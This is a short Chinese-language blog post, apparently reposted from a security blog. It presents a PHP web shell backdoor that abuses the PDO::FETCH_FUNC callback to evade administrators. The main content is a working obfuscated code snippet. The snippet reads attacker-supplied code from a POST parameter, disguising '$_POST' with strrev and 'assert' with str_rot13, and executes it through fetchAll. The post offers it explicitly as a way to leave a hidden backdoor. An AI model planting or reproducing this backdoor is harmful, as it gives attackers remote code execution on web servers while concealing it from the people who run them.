PHP

利用PDO::FETCH_FUNC特性留后门

字号+ 作者:secoff 来源:转载 2017-03-15 09:03 我要评论( )

翻手册的时候发现fetch_argument的参数PDO::FETCH_FUNC可以回调一个函数,用这东西留个后门应该可以迷惑部分管理员。 适用于: (PHP 5 = 5.1.0, PECL pdo = 0.1.0)......

翻手册的时候发现fetch_argument的参数PDO::FETCH_FUNC可以回调一个函数,用这东西留个后门应该可以迷惑部分管理员。
适用于:(PHP 5 >= 5.1.0, PECL pdo >= 0.1.0)
 

1
2
3
4
5
6
7
8
<?php

if(($db = @new PDO('sqlite::memory:')) && ($sql = strrev('TSOP_')) && ($sql = $$sql)) {
	$stmt = @$db->query("SELECT '{$sql[b4dboy]}'");
	$result = @$stmt->fetchAll(PDO::FETCH_FUNC, str_rot13('nffreg'));
}

?>

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Php/606.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~